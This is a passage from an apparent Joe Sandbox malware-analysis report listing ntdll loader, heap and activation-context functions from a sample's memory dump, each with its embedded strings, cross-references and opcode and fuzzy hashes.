                                                              • API String ID: 0-1109411897
                                                              • Opcode ID: 3cd6b1c57364d04dcd66e1b39506a450edcf2cc6c3ff91162c3eb75ab0215627
                                                              • Instruction ID: 6c36fa4d0a6db098ee3934c3d307f4e4a19d7d35a84a7bbff9a3c1626d3a57fd
                                                              • Opcode Fuzzy Hash: 3cd6b1c57364d04dcd66e1b39506a450edcf2cc6c3ff91162c3eb75ab0215627
                                                              • Instruction Fuzzy Hash: ABA26E74A056298FDF64CF18CC88BADBBB5AF45708F1442E9D90EA7651EB349E84CF04
                                                              Function 013863FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-792281065
                                                              • Opcode ID: c7d48e67806fb394b69f6dd5fa9df7cb889ceed6a6cc9da5896fce5b37f3c3fd
                                                              • Instruction ID: cd89486a2d6481b4a6661878d16fb15e085e18b44ba02104b0759f0e7fc706a4
                                                              • Opcode Fuzzy Hash: c7d48e67806fb394b69f6dd5fa9df7cb889ceed6a6cc9da5896fce5b37f3c3fd
                                                              • Instruction Fuzzy Hash: 959102B5B003199BEB25EF5CE856BAE7BA6BF41F2CF10412DE9407B691DB709801C790
                                                              Function 0134645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 013A99ED
                                                              • LdrpInitShimEngine, xrefs: 013A99F4, 013A9A07, 013A9A30
                                                              • Getting the shim engine exports failed with status 0x%08lx, xrefs: 013A9A01
                                                              • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 013A9A2A
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 013A9A11, 013A9A3A
                                                              • apphelp.dll, xrefs: 01346496
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-204845295
                                                              • Opcode ID: d2adf9bfffd769511975ee98e947cd15c52f6173b30e3d182be709f5bf97b45e
                                                              • Instruction ID: 1394810b7717e3b9d5204b86707a48afb4a79cff53141ca28abb74760bc211ad
                                                              • Opcode Fuzzy Hash: d2adf9bfffd769511975ee98e947cd15c52f6173b30e3d182be709f5bf97b45e
                                                              • Instruction Fuzzy Hash: 54519275208305DFE725DF28D851B6B7BE8FF85A4CF40491EF595AB260DA30E904CB92
                                                              Function 01382674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 013C2180
                                                              • RtlGetAssemblyStorageRoot, xrefs: 013C2160, 013C219A, 013C21BA
                                                              • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 013C219F
                                                              • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 013C21BF
                                                              • SXS: %s() passed the empty activation context, xrefs: 013C2165
                                                              • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 013C2178
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                              • API String ID: 0-861424205
                                                              • Opcode ID: 015ab748e143ec37dd5c7bae2df9d1a50e604808a79d531dbed2a75c2564579a
                                                              • Instruction ID: 99aeda9a1f48cdb363cfab771eaa7ffd500a179fa1bc5ec67eda0aaed47a8908
                                                              • Opcode Fuzzy Hash: 015ab748e143ec37dd5c7bae2df9d1a50e604808a79d531dbed2a75c2564579a
                                                              • Instruction Fuzzy Hash: 673135BAB403157BF721AB9A8C85F5B7B78DBE5E5CF05005DFA05AB201D2709E01C3A0
                                                              Function 0138C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • Unable to build import redirection Table, Status = 0x%x, xrefs: 013C81E5
                                                              • Loading import redirection DLL: '%wZ', xrefs: 013C8170
                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 013C8181, 013C81F5
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 0138C6C3
                                                              • LdrpInitializeProcess, xrefs: 0138C6C4
                                                              • LdrpInitializeImportRedirection, xrefs: 013C8177, 013C81EB
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                              • API String ID: 0-475462383
                                                              • Opcode ID: 08a920239385dd735428087a7799ccf03fa0b4f39557e84e471692cc629317ac
                                                              • Instruction ID: 5fa320fcd91762404b7e0ebc6af3ed360137fa0a194757d5389c1a12e60a7c30
                                                              • Opcode Fuzzy Hash: 08a920239385dd735428087a7799ccf03fa0b4f39557e84e471692cc629317ac
                                                              • Instruction Fuzzy Hash: 6D3102726443469FD220EF2DD946E1A7BE4EF94F2CF04456CF9806B391E620ED04C7A2
                                                              Function 0139096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 01392DF0: LdrInitializeThunk.NTDLL ref: 01392DFA
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01390BA3
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01390BB6
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01390D60
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01390D74
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                              • String ID:
                                                              • API String ID: 1404860816-0
                                                              • Opcode ID: 99ef0191f0555aa21ced98d9193978f10dee65e5b6eef578b011fe6c40e8c2a4
                                                              • Instruction ID: 24879c7d13ae18b3f7dc5b19969d45d64e548a36e2b2c6918f0dae5dc27e6e69
                                                              • Opcode Fuzzy Hash: 99ef0191f0555aa21ced98d9193978f10dee65e5b6eef578b011fe6c40e8c2a4
                                                              • Instruction Fuzzy Hash: 17425B75900715DFDF25CF28C880BAAB7F9BF04318F1445A9E999EB241E770AA84CF61
                                                              Function 0135A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                              • API String ID: 0-379654539
                                                              • Opcode ID: c87b9f6f8d82b9c8c4c999042f70d6c9c4520cacc1bf0133df415cd4f17a5610
                                                              • Instruction ID: 00f86c61a354c81ba5861caea33194da93359da4034763db44385f176e579eee
                                                              • Opcode Fuzzy Hash: c87b9f6f8d82b9c8c4c999042f70d6c9c4520cacc1bf0133df415cd4f17a5610
                                                              • Instruction Fuzzy Hash: BEC18AB4108386CFD751CF58C040BAABBE8BF88B0CF044A6AF9959B750E734D949DB56
                                                              Function 01388402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • @, xrefs: 01388591
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 01388421
                                                              • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0138855E
                                                              • LdrpInitializeProcess, xrefs: 01388422
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-1918872054
                                                              • Opcode ID: e21e635d90e314865fdb254580b7d918a3eef50b2e34c1b546b1ffb8740ab609
                                                              • Instruction ID: 14c70c00ace2cf385e95be5dcc18c6fad3235a4cb791e46fa6b4fd44021851bc
                                                              • Opcode Fuzzy Hash: e21e635d90e314865fdb254580b7d918a3eef50b2e34c1b546b1ffb8740ab609
                                                              • Instruction Fuzzy Hash: CC918F71608345AFDB21EF69CC40EABBAECBF8475CF80496DF68496151E330D904CB62
                                                              Function 0138273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 013C22B6
                                                              • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 013C21D9, 013C22B1
                                                              • SXS: %s() passed the empty activation context, xrefs: 013C21DE
                                                              • .Local, xrefs: 013828D8
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                              • API String ID: 0-1239276146
                                                              • Opcode ID: 86dd939acd15d939da005f8d77c8a059f3bf9f40c724262b8a7b055d6215b61b
                                                              • Instruction ID: 1a1ee300c9b291b85b4cd212b59fcdeb1ce698e78b742d9d8edb1f76480f3968
                                                              • Opcode Fuzzy Hash: 86dd939acd15d939da005f8d77c8a059f3bf9f40c724262b8a7b055d6215b61b
                                                              • Instruction Fuzzy Hash: 81A1BF35900329DBDF24EF69CC84BAAB7B5BF58758F1441EAE908A7251D7309E80CF90
                                                              Function 01384AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 013C3456
                                                              • SXS: %s() called with invalid flags 0x%08lx, xrefs: 013C342A
                                                              • RtlDeactivateActivationContext, xrefs: 013C3425, 013C3432, 013C3451
                                                              • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 013C3437
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                              • API String ID: 0-1245972979
                                                              • Opcode ID: 123724007e14483a4e64659380effcbbaf67b8981d48dd0eac5f6f4a312d5afe
                                                              • Instruction ID: d0e42d77ccdf684eaa15ad195c784fc98620936a0cfc1b613de9a8402042a2a0
                                                              • Opcode Fuzzy Hash: 123724007e14483a4e64659380effcbbaf67b8981d48dd0eac5f6f4a312d5afe
                                                              • Instruction Fuzzy Hash: 99612536644712ABDB22DF1DC881B2AF7E9FF90B18F14851DE895ABA41D730EC01CB91
                                                              Function 013564AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 013B0FE5
                                                              • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 013B10AE
                                                              • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 013B106B
                                                              • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 013B1028
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                              • API String ID: 0-1468400865
                                                              • Opcode ID: 74599f59450e04012499f886d140c220481f56dfe8dc2fac2367c41dff17f39a
                                                              • Instruction ID: 15be40f7f44b8c8008e45e3d4fdd355fdf7c5f14436138363ff4f353fe48b61b
                                                              • Opcode Fuzzy Hash: 74599f59450e04012499f886d140c220481f56dfe8dc2fac2367c41dff17f39a
                                                              • Instruction Fuzzy Hash: 2171DDB1944345AFCB61DF18C885F9B7BA8AF54B6CF800968FD498B246D734D188CBD2
                                                              Function 01384D1D Relevance: 5.1, Strings: 4, Instructions: 117COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 013C362F
                                                              • minkernel\ntdll\ldrsnap.c, xrefs: 013C3640, 013C366C
                                                              • LdrpFindDllActivationContext, xrefs: 013C3636, 013C3662
                                                              • Querying the active activation context failed with status 0x%08lx, xrefs: 013C365C
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                              • API String ID: 0-3779518884
                                                              • Opcode ID: 1f642bbb22e4919541419b78ce61f4ce36c87308113d606791da2c925b3a8325
                                                              • Instruction ID: 0ef5d47beb2e810d5a344138ba9dab74a3182138c328d7b8abec2764bd4679bc
                                                              • Opcode Fuzzy Hash: 1f642bbb22e4919541419b78ce61f4ce36c87308113d606791da2c925b3a8325
                                                              • Instruction Fuzzy Hash: B431CA329007579FEF32FF0CC889B657AA4BB01A5CF068129D90457E63D7A09D8887D5
                                                              Function 0137245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • LdrpDynamicShimModule, xrefs: 013BA998
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 013BA9A2
                                                              • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 013BA992
                                                              • apphelp.dll, xrefs: 01372462
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-176724104
                                                              • Opcode ID: 0e027b264cc1fd34377cf22e4c75a9e9f015ed4efe31e625135cd97b8d0fe146
                                                              • Instruction ID: 65da4b6960076a41a26e8c8b7aa93832230433ea551762129cfe0f600053987f
                                                              • Opcode Fuzzy Hash: 0e027b264cc1fd34377cf22e4c75a9e9f015ed4efe31e625135cd97b8d0fe146
                                                              • Instruction Fuzzy Hash: D9315779A00205EBEB31DF5DD881EAABBB8FB84B0CF16405DFA0167665E7709881D790
                                                              Function 013629A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • HEAP: , xrefs: 01363264
                                                              • HEAP[%wZ]: , xrefs: 01363255
                                                              • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0136327D
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                              • API String ID: 0-617086771
                                                              • Opcode ID: c6217daca6487d1435fa16e967efa13b63df7b291428cc0b4f67a86bc23697d9
                                                              • Instruction ID: 405fa722491db2c145987398547961949100d0488acd65d51f58ab2943a05e9d
                                                              • Opcode Fuzzy Hash: c6217daca6487d1435fa16e967efa13b63df7b291428cc0b4f67a86bc23697d9
                                                              • Instruction Fuzzy Hash: 2492BB70A04249DFDB25CF68C4447AEBBF9FF08308F19C069E859AB799D734A945CB50
                                                              Function 01360770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                              • API String ID: 0-4253913091
                                                              • Opcode ID: e3302f9d3582ae0b4cee7e734fd7c493e38d2df85ccf2e86925641897384f6f2
                                                              • Instruction ID: a33b7a1283463454c6cfa831e5552c58ea6a32ee9c0b887b362d3d1a8c083152
                                                              • Opcode Fuzzy Hash: e3302f9d3582ae0b4cee7e734fd7c493e38d2df85ccf2e86925641897384f6f2
                                                              • Instruction Fuzzy Hash: 01F1BF30600606DFEB29CF68C885BAABBF9FF44308F148169E5169B795D734E981CF90
                                                              Function 01376962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $@
                                                              • API String ID: 0-1077428164
                                                              • Opcode ID: 087ce6f0ab08f35def266e31662e9f7d6a6456978b8b009bb58bcd8dde1f7551
                                                              • Instruction ID: 6651a0064d403e2943dc602d3db37b76d4c97da115d82f89e30bbc10959aa3e5
                                                              • Opcode Fuzzy Hash: 087ce6f0ab08f35def266e31662e9f7d6a6456978b8b009bb58bcd8dde1f7551
                                                              • Instruction Fuzzy Hash: 63C283716087459FEB35CF28C485BABBBE5AF88758F04892DF989C7241E738D805CB52
                                                              Function 0134A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: FilterFullPath$UseFilter$\??\
                                                              • API String ID: 0-2779062949
                                                              • Opcode ID: d92488e2ed053c9d74b91fb43b481ee5db681adadf31b4ed57f7a52e5e6e24ff
                                                              • Instruction ID: 46c99536d704ca79dd5b925b3f62f343d4d36392d28bd960112b674200374c3b
                                                              • Opcode Fuzzy Hash: d92488e2ed053c9d74b91fb43b481ee5db681adadf31b4ed57f7a52e5e6e24ff
                                                              • Instruction Fuzzy Hash: 61A17D769016299BDF31DF28CC88BEAB7B8EF44718F1041E9E909A7250D735AE84CF50
                                                              Function 01370BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • LdrpCheckModule, xrefs: 013BA117
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 013BA121
                                                              • Failed to allocated memory for shimmed module list, xrefs: 013BA10F
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-161242083
                                                              • Opcode ID: 255e5ca3e823349b3b2667eee4bbb5f90534bfae49aed3dc0a67abc0571bfe68
                                                              • Instruction ID: f327c6be9ac29c1b94ac4b548b4badfa25830051f63d201f0a9885887d96c198
                                                              • Opcode Fuzzy Hash: 255e5ca3e823349b3b2667eee4bbb5f90534bfae49aed3dc0a67abc0571bfe68
                                                              • Instruction Fuzzy Hash: EF71D174A0020ADFDF29DFACC981ABEB7F4FB45608F15402DE906EB615E734A941CB50
                                                              Function 01360A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                              • API String ID: 0-1334570610
                                                              • Opcode ID: bb713bfa9844102b49779dac35348f74bbbb3cbbbbd0f81d7302d242244bc86e
                                                              • Instruction ID: 9848a21c3b522db32eca47556c2a22aeb5fff55d84ba7da886181ca8c30c035c
                                                              • Opcode Fuzzy Hash: bb713bfa9844102b49779dac35348f74bbbb3cbbbbd0f81d7302d242244bc86e
                                                              • Instruction Fuzzy Hash: 6F61B0706003059FDB29CF28C481BAABBE9FF45708F14C55DE5898B79AD770E881CB91
                                                              Function 0138C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • Failed to reallocate the system dirs string !, xrefs: 013C82D7
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 013C82E8
                                                              • LdrpInitializePerUserWindowsDirectory, xrefs: 013C82DE
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-1783798831
                                                              • Opcode ID: ebe38e75fa95b689810eeb188a5bc30692dd6f75a0bad589fdcccdacd146db06
                                                              • Instruction ID: 989d2b0389effe88aaf2ee1928e81658f34283d10105b686a73f9e79872c92ce
                                                              • Opcode Fuzzy Hash: ebe38e75fa95b689810eeb188a5bc30692dd6f75a0bad589fdcccdacd146db06
                                                              • Instruction Fuzzy Hash: DD41DFB6540315AFDB31FB68D844B9B7BE8FF48A58F01492AF948D7264E770D800CBA1
                                                              Function 0140C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0140C1C5
                                                              • PreferredUILanguages, xrefs: 0140C212
                                                              • @, xrefs: 0140C1F1
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                              • API String ID: 0-2968386058
                                                              • Opcode ID: bbf53cd9f3656900d584c89b0ad1d39d881e86330599806b7318b99d6d1d9c86
                                                              • Instruction ID: 96f783df0039460606f814382dcd54d89890e1f37b1f65d8a695d72edba7c0a8
                                                              • Opcode Fuzzy Hash: bbf53cd9f3656900d584c89b0ad1d39d881e86330599806b7318b99d6d1d9c86
                                                              • Instruction Fuzzy Hash: 1F416171E00209EBDF12DBD9C881BEEBBB8AB14714F1441BBE609A7690D7749A458B50
                                                              Function 013E4144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                              • API String ID: 0-1373925480
                                                              • Opcode ID: b76715ec42c35850ce23d33d18acd011593ee93d6f9d4f2fa43fde886c3745d6
                                                              • Instruction ID: 701dce7895322c0984139021f897ce6520701983afa1c7530d58ebfae3957414
                                                              • Opcode Fuzzy Hash: b76715ec42c35850ce23d33d18acd011593ee93d6f9d4f2fa43fde886c3745d6
                                                              • Instruction Fuzzy Hash: 6141E172A04769CBEB25DB98C848BADBBF8FF59348F14045ADA01EB7D1D6349901CB10
                                                              Function 013D4755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 013D4899
                                                              • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 013D4888
                                                              • LdrpCheckRedirection, xrefs: 013D488F
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                              • API String ID: 0-3154609507
                                                              • Opcode ID: cc8b71a0c4cddb300db310a7265973f286ca2cb283408bdedc2ac5528527c3fe
                                                              • Instruction ID: 97d5ab211be6814747f549e57572126f71f2aab73a75f42805c0b5d3048fd45c
